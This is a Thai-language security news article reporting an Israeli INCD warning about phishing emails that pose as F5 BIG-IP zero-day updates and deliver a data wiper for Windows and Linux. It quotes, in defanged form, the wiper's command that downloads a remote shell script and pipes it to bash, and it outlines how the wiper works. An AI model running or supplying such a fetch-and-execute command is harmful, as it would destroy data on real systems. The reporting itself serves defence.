Israel National Cyber Directorate เตือน พบอีเมลฟิชชิ่งที่แอบอ้างว่าเป็นการอัปเดตความปลอดภัย Zero-Day ของระบบ F5 BIG-IP ติดตั้งและทำงานได้บน Windows และ Linux
Israel's National Cyber Directorate (INCD) ของอิสราเอลทำหน้าที่เป็น Israel-CERT ที่มีหน้าที่รับผิดชอบในการปกป้องประเทศจากภัยคุกคามทางไซเบอร์และเตือนองค์กรและบริษัทรวมถึงภาคประชาชนเกี่ยวกับการโจมตีด้านไซเบอร์
ตั้งแต่เดือนตุลาคมที่ผ่านมา อิสราเอลตกเป็นเป้าหมายอย่างหนักโดยแฮกเกอร์ผู้สนับสนุนฝ่ายจากปาเลสไตน์และอิหร่าน ซึ่งดำเนินการขโมยข้อมูลและโจมตีเพื่อทำลายล้างข้อมูลในองค์กรต่างๆ ในประเทศอิสราเอล
ในเดือนพฤศจิกายน มีการค้นพบมัลแวร์สำหรับทำลายล้างข้อมูลตัวใหม่เรียกว่า BiBi Wiper ซึ่งสามารถติดตั้งและทำงานได้บนระบบปฏิบัติการ Linux และ Windows โดยเชื่อว่ามัลแวร์ตัวนี้สร้างขึ้นโดยแฮกเกอร์ที่สนับสนุนกลุ่มฮามาส
ซอร์ฟแวร์ F5 update deploys wiper
วานนี้ INCD เตือนถึงการโจมตีแบบฟิชชิ่งครั้งใหม่โดยใช้การหลอกลวงผ่านทางอีเมลโดยอ้างว่าเป็นคำเตือนเกี่ยวกับช่องโหว่แบบ Zero-Day ในอุปกรณ์ F5 BIG-IP
กลุ่ม hacktivist ที่สนับสนุนฝ่ายปาเลสไตน์ชื่อ Handala บอกกับ BleepingComputer ว่าพวกเขาเป็นผู้รับผิดชอบการโจมตีแบบฟิชชิ่ง โดยระบุว่ามันถูกนำไปใช้กับเครือข่ายของอิสราเอลหลายแห่ง แต่ BleepingComputer ไม่สามารถยืนยันการออกมารับผิดชอบในครั้งนี้ได้
อีเมลฟิชชิ่งเตือนว่าช่องโหว่แบบ Zero-day ของ F5 BIG-IP ถูกแพร่ประจายและใช้โจมตีอย่างต่อเนื่อง โดยมีลักษณะคือการหลอกลวงให้องค์กรอิสราเอลดาวน์โหลดและติดตั้งการอัปเดตความปลอดภัยก่อนที่เครือข่ายจะถูกละเมิด
สำหรับผู้ใช้ Windows ในอีเมลจะแนบไฟล์ปฏิบัติการชื่อ F5UPDATER.exe และสำหรับผู้ใช่้ Linux ไฟล์ดังกล่าวจะเป็น Shell Script ชื่อ update.sh มีลักษณะคือ wget -O - https[:]//sjc1[.]vultrobjects[.]com/f5update/update[.]sh | bash
เมื่อทำการเริ่มให้ซอร์ฟแวร์ทั้งเวอร์ชัน Windows และ Linux ทำงาน จะพยายามเลียนแบบการอัปเดตความปลอดภัย F5 โดยการแสดงโลโก้ของบริษัท F5 บนหน้าจอ
ตัวอย่างเช่น การล้างข้อมูลบน Windows จะแสดงหน้าจอขนาดเล็กที่มีโลโก้ F5 ซึ่งปลอมตัวเป็นโปรแกรมติดตั้งการอัปเดตความปลอดภัย ดังภาพด้านล่าง
เมื่อคลิกปุ่ม Update ซอร์ฟแวร์จะส่งข้อมูลของเครื่องที่กำลังจะดำเนินการลบข้อมูลไปยัง Telegram Channel และพยายามล้างข้อมูลทั้งหมดจากคอมพิวเตอร์เครื่องนั้น
อย่างไรก็ตาม ในการทดสอบของ BleepingComputer ซอร์ฟแวร์ลบข้อมูลนี้มี Bug อยู่เล็กน้อย โดยจะไม่สามารถลบข้อมูลทั้งหมดบนคอมพิวเตอร์ได้
และสำหรับการลบข้อมูลบนระบบ Linux คือ Shell Script นั้นจะทำการดาวน์โหลดโปรแกรมที่จำเป็นสำหรับการลบข้อมูลบนเครื่องมาทำงานเพิ่มเติม เช่น xfsprogs, wipe, และ parted เป็นต้น
ขั้นตอนการลบข้อมูลบนระบบ Linux นั้น จะเริ่มต้นโปรแกรมจะลบผู้ใช้ทั้งหมดในระบบ
ปัจจุบันซอร์ฟเวอร์ลบล้างข้อมูลบนระบบปฏิบัติการกลายเป็นปัญหาใหญ่สำหรับอิสราเอล โดย hacktivist มักใช้สิ่งเหล่านี้ในการโจมตีแบบทำลายล้างเพื่อขัดขวางการดำเนินงานต่างๆและด้านเศรษฐกิจของอิสราเอล
และเช่นเคยการป้องกันตนเองที่ดีที่สุดคือการไม่ดาวน์โหลดไฟล์หรือดาวน์โหลดไฟล์จากอีเมลจากบุคคลหรือต้นทางจากแหล่งที่เชื่อถือได้และได้รับการยืนยันแล้วเท่านั้น
นอกจากนี้ควรดาวน์โหลดซอร์ฟแวร์การอัปเดตความปลอดภัยต่างๆ จากผู้จำหน่ายซอร์ฟแวร์หรือฮาร์ดแวร์โดยตรงเท่านั้น ไม่ใช่จากไซต์ภายนอกหรือเว็บไซต์ของบุคคลที่สามเป็นต้น
อ้างอิง Fake F5 BIG-IP zero-day warning emails push data wipers (bleepingcomputer.com)
แฮกเกอร์ใช้ประโยชน์จากช่องโหว่ในโมดูล Facebook ระดับพรีเมียมสำหรับ PrestaShop ที่ชื่อว่า pkfacebook เพื่อปล่อย Card skimmer บนไซต์ E-commerce ที่มีช่องโหว่ และขโมยข้อมูลบัตรเครดิตการชำระเงิน
นักวิจัยจาก Sonatype นามว่า Ax Sharma พบแพ็กเกจอันตรายของ PyPi ที่เป็นส่วนหนึ่งของแคมเปญที่ผ่านมาชื่อว่า 'Cool package' ตั้งชื่อตามสตริงในข้อมูล Metadata ของแพ็กเกจที่กำหนดเป้าหมายผู้ใช้ Windows เมื่อปีที่แล้ว
Google ปล่อยแพตช์แก้ไขช่องโหว่ด้านความปลอดภัยทั้งหมด 9 ช่องโหว่บนเบราว์เซอร์ Chrome รวมถึงช่องโหว่ Zero-Day ที่มีรายงานว่าถูกใช้ในการโจมตีจริงแล้ว